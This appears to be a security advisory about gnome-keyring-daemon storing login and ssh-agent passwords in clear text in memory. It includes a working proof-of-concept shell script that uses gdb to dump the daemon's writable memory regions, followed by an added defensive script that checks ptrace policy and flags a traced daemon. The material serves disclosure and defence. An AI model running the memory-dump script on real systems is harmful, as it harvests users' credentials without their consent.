Gnome Keyring Daemon Credential Disclosure

Type packetstorm
Reporter Luca Ercoli
Modified 2017-04-24T00:00:00


gnome-keyring-daemon is vulnerable to local credential disclosure.
Fortunately, the attack can only be carried out on machines that are
already compromised, but sadly, in those cases, an attacker can leverage
gnome-keyring-daemon to obtain sensitive data.

The application stores the passwords of logged-in users in clear text in
the process memory, and hence exposes this information (such as the login
password, the ssh-agent passphrase, etc.) to an attacker.

In this scenario, the attacker can read this data instantly, without
cracking anything or installing a keylogger, sniffer or various other
tools, simply by using gnome-keyring-daemon itself: the information can be
extracted from its memory with a debugger (such as "gdb").

At this URL, there is a script (named "")
that can be used as a PoC:
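    # $1 is the PID of the target process (gnome-keyring-daemon)
    mkdir "$1"
    cd "$1" || exit 1
    # For every writable private mapping, have gdb dump the region to a file
    grep rw-p "/proc/$1/maps" \
    | awk '{print $1}' \
    | sed 's/-/ /' \
    | while read -r mem_start mem_end; do
        gdb --pid "$1" --batch-silent \
            -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"
    done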
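
The PoC depends on gdb being allowed to attach to the daemon with ptrace. The following defensive check is an added example, not part of the original advisory or of the GNOME project: it reports the kernel's Yama ptrace_scope policy and flags a gnome-keyring-daemon that currently has a tracer attached. The function names and the --live switch are assumptions made for this example, and a root attacker holding CAP_SYS_PTRACE can still attach at levels 0 to 2.

```shell
#!/bin/sh
# Added example, not from the advisory: audit exposure to a ptrace-based dump.
# File paths are parameters so the checks can run against constructed samples.

# Map a Yama ptrace_scope value to its effect on attaching to a running process.
scope_verdict() {
    case "$1" in
        0) echo "exposed: any same-uid process may attach" ;;
        1) echo "restricted: unprivileged attach only by an ancestor or declared tracer" ;;
        2) echo "admin-only: attach requires CAP_SYS_PTRACE" ;;
        3) echo "disabled: no process may attach" ;;
        *) echo "unknown: Yama value not readable" ;;
    esac
}

# Print the TracerPid field of a /proc/<pid>/status file (0 means not traced).
tracer_pid() {
    awk '/^TracerPid:/ {print $2}' "$1"
}

# Report policy and current tracer for one PID; returns 1 if a tracer is attached.
audit_pid() {
    pid=$1
    scope_file=${2:-/proc/sys/kernel/yama/ptrace_scope}
    status_file=${3:-/proc/$pid/status}
    scope=$(cat "$scope_file" 2>/dev/null) || scope=""
    echo "ptrace_scope=${scope:-n/a} -> $(scope_verdict "$scope")"
    tracer=$(tracer_pid "$status_file" 2>/dev/null) || tracer=""
    if [ -n "$tracer" ] && [ "$tracer" != "0" ]; then
        echo "ALERT: pid $pid is being traced by pid $tracer"
        return 1
    fi
    echo "pid $pid: no tracer attached"
}

# Audit every running gnome-keyring-daemon (comm names are cut to 15 chars).
audit_keyring() {
    rc=0
    for p in $(pgrep -x gnome-keyring-d 2>/dev/null); do
        audit_pid "$p" || rc=1
    done
    return $rc
}

# Run the live audit only when asked: sh audit.sh --live
if [ "${1:-}" = "--live" ]; then audit_keyring; fi
```

A non-zero exit status from audit_keyring means at least one daemon instance had a tracer attached when it was checked.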